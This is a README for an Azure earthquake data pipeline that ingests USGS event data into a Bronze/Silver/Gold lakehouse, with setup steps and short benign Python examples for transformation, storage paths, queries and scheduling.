Uday-hash-bit

🌍 Earthquake-Data-Engineering-Pipeline-on-Azure - Analyze Earthquake Data Easily


📋 Overview

The Earthquake Data Engineering Pipeline on Azure is an end-to-end pipeline for analyzing real-time earthquake data. It pulls event data from the USGS API, processes it, and stores it in a Bronze–Silver–Gold lakehouse architecture: raw data lands in Bronze, cleaned data in Silver, and analysis-ready data in Gold. You can run it manually or schedule it for daily automated updates.
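The Bronze, Silver, and Gold stages can be illustrated with a minimal sketch. It is not the project's actual code: the function names `to_silver` and `to_gold` and the sample record are hypothetical, and the sample only mirrors the general shape of a feature in a USGS GeoJSON response (epoch-millisecond `time`, `[longitude, latitude, depth]` coordinates).

```python
from datetime import datetime, timezone

# Hypothetical sample shaped like one feature from a USGS GeoJSON response.
# In the pipeline, records like this would be stored unchanged in Bronze.
SAMPLE_FEATURE = {
    "type": "Feature",
    "id": "example0001",
    "properties": {
        "mag": 4.6,
        "place": "10 km N of Exampleville",
        "time": 1700000000000,  # epoch milliseconds
    },
    "geometry": {"type": "Point", "coordinates": [-122.5, 38.1, 12.3]},
}


def to_silver(feature):
    """Flatten one raw (Bronze) feature into a tabular (Silver) record."""
    props = feature["properties"]
    lon, lat, depth_km = feature["geometry"]["coordinates"]
    return {
        "id": feature["id"],
        "magnitude": props["mag"],
        "place": props["place"],
        "time_utc": datetime.fromtimestamp(props["time"] / 1000, tz=timezone.utc),
        "longitude": lon,
        "latitude": lat,
        "depth_km": depth_km,
    }


def to_gold(silver_rows):
    """Aggregate Silver records into a per-day event count (Gold)."""
    counts = {}
    for row in silver_rows:
        day = row["time_utc"].date().isoformat()
        counts[day] = counts.get(day, 0) + 1
    return counts


silver = [to_silver(SAMPLE_FEATURE)]
gold = to_gold(silver)
```

In a real deployment these steps would more likely run as Spark jobs in Databricks; plain Python is used here only to keep the idea visible.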

🛠️ Features

🚀 Getting Started

Follow these steps to set up your Earthquake Data Pipeline:

🖥️ System Requirements

📥 Download & Install

To download the application, please visit the link below:

Download Earthquake Data Engineering Pipeline

  1. Click the link above to go to the Releases page.
  2. Find the latest version listed at the top.
  3. Download the ZIP file or other available packages for your operating system.
  4. Extract the files to a location of your choice.

📂 Setting Up

  1. Open the extracted folder.
  2. Follow the included instructions for setting up an Azure environment.
  3. Configure the Azure services listed under Azure Setup before proceeding.

🛠️ Configuration

⚙️ Azure Setup

  1. Azure Data Factory: Set up a Data Factory instance to orchestrate the data pipeline.
  2. Databricks: Create a Databricks workspace for data analysis and transformation.
  3. ADLS Gen2: Configure Azure Data Lake Storage Gen2 to store your raw and processed data.
  4. Synapse Analytics: Set up a Synapse instance to facilitate data querying and visualization.
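As a sketch of how the lakehouse layers might map onto ADLS Gen2, the helper below builds `abfss://` URIs of the kind Databricks and Synapse use to address a storage account. The function name `layer_path`, the dataset folder `earthquakes`, and the choice of one folder per layer inside a single container are assumptions for illustration, not the project's confirmed layout.

```python
LAYERS = ("bronze", "silver", "gold")


def layer_path(account, container, layer, dataset="earthquakes"):
    """Build an abfss:// URI for one lakehouse layer (hypothetical layout)."""
    if layer not in LAYERS:
        raise ValueError(f"unknown layer: {layer!r}")
    return f"abfss://{container}@{account}.dfs.core.windows.net/{layer}/{dataset}"


# Example with placeholder names; substitute your own account and container.
bronze_uri = layer_path("mystorageaccount", "lake", "bronze")
```

Keeping the path logic in one place makes it easier to switch to a container-per-layer layout later if that suits your access policies better.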

🔑 API Key

The USGS earthquake catalog API is public and generally does not require an API key. If the endpoint you use does require one:

  1. Visit the USGS API website.
  2. Register for an API key if required.
  3. Save your API key in a secure location for later use.
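For orientation, here is a minimal sketch of building a request URL for the public USGS FDSN event service. The helper names `build_query_url` and `load_api_key` and the environment variable `USGS_API_KEY` are hypothetical. The sketch assumes the endpoint accepts unauthenticated requests, so the key is only read, never sent; how a key would be attached depends on the service you actually call.

```python
import os
from urllib.parse import urlencode

USGS_QUERY_URL = "https://earthquake.usgs.gov/fdsnws/event/1/query"


def load_api_key():
    """Read an optional key from the environment instead of hard-coding it.

    USGS_API_KEY is a hypothetical variable name; returns None when unset.
    """
    return os.environ.get("USGS_API_KEY")


def build_query_url(start, end, min_magnitude=None):
    """Build a GeoJSON query URL for events between two ISO dates."""
    params = {"format": "geojson", "starttime": start, "endtime": end}
    if min_magnitude is not None:
        params["minmagnitude"] = min_magnitude
    return f"{USGS_QUERY_URL}?{urlencode(params)}"


url = build_query_url("2024-01-01", "2024-01-02", min_magnitude=4.5)
```

The resulting URL can be fetched with any HTTP client; the response is a GeoJSON feature collection.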

📊 How to Use

🏄‍♂️ Running the Pipeline

  1. Open your command line or terminal.
  2. Navigate to the directory where you extracted the files.
  3. Use the following command to run the application:
    python run_pipeline.py
    
  4. Monitor the output for errors. If the run fails, re-check your Azure configuration.
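A quick pre-flight check can catch missing configuration before the pipeline starts. The sketch below is an assumption about how such a check could look. The setting names are hypothetical, and `run_pipeline.py` may read its configuration differently.

```python
import os

# Hypothetical setting names; the project's real configuration keys may differ.
REQUIRED_SETTINGS = (
    "AZURE_STORAGE_ACCOUNT",
    "AZURE_STORAGE_CONTAINER",
    "DATABRICKS_HOST",
)


def missing_settings(env, required=REQUIRED_SETTINGS):
    """Return the names of required settings that are unset or blank in env."""
    return [name for name in required if not env.get(name, "").strip()]


def check_environment():
    """Stop with a readable message if any required setting is missing."""
    missing = missing_settings(os.environ)
    if missing:
        raise SystemExit("Missing settings: " + ", ".join(missing))
```

Calling `check_environment()` at the top of a run script would stop early with a list of what still needs to be set.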

📅 Scheduling Jobs

To set up daily-triggered workflows:

  1. Use Azure Data Factory's scheduling features.
  2. Configure triggers based on your requirements for data ingestion.
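As an illustration of a daily trigger, the sketch below assembles a trigger definition in the JSON shape Azure Data Factory uses for schedule triggers. The helper name `daily_trigger` and the pipeline name `earthquake_pipeline` are hypothetical. Verify the field names against the current ADF documentation before deploying.

```python
import json


def daily_trigger(pipeline_name, start_time_utc):
    """Build a once-a-day ScheduleTrigger definition for the named pipeline."""
    return {
        "name": f"{pipeline_name}-daily",
        "properties": {
            "type": "ScheduleTrigger",
            "typeProperties": {
                "recurrence": {
                    "frequency": "Day",
                    "interval": 1,
                    "startTime": start_time_utc,
                    "timeZone": "UTC",
                }
            },
            "pipelines": [
                {
                    "pipelineReference": {
                        "type": "PipelineReference",
                        "referenceName": pipeline_name,
                    }
                }
            ],
        },
    }


# "earthquake_pipeline" is a placeholder for your actual ADF pipeline name.
trigger = daily_trigger("earthquake_pipeline", "2024-01-01T06:00:00Z")
trigger_json = json.dumps(trigger, indent=2)
```

The JSON can be pasted into the trigger's code view in ADF Studio or deployed with your usual infrastructure tooling.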

📈 Monitoring and Analysis

You can visualize the processed data using Azure Synapse Analytics or Power BI. Set up dashboards to analyze trends and gain insight into earthquake activity.
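One simple trend view is a count of events per whole-number magnitude bin. The sketch below shows the kind of aggregate a dashboard might plot. The function name `magnitude_histogram` and the sample values are hypothetical and are not taken from the pipeline's Gold tables.

```python
import math
from collections import Counter


def magnitude_histogram(magnitudes):
    """Count events per whole-number magnitude bin (4.6 falls in bin 4).

    Records with a missing magnitude (None) are skipped.
    """
    bins = Counter(math.floor(m) for m in magnitudes if m is not None)
    return dict(sorted(bins.items()))


# Made-up sample magnitudes for illustration only.
histogram = magnitude_histogram([4.6, 4.1, 5.0, None, 2.9])
```

The same grouping can be expressed as a SQL `GROUP BY` in Synapse or as a measure in Power BI once the data is in the Gold layer.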

📃 Documentation

A detailed guide on all pipeline configurations and parameters can be found in the documentation folder included in the download.

🧑‍🤝‍🧑 Support and Community

If you need help using the Earthquake Data Engineering Pipeline, you can:

📚 Additional Resources

⚖️ License

This project is licensed under the MIT License. Please see the LICENSE file for more details.

🧾 Acknowledgements

Thanks to the Azure community for providing amazing tools and support. Thanks also to the USGS for the valuable earthquake data.


Get started today by visiting the Download page and launching your analysis of earthquake data with ease!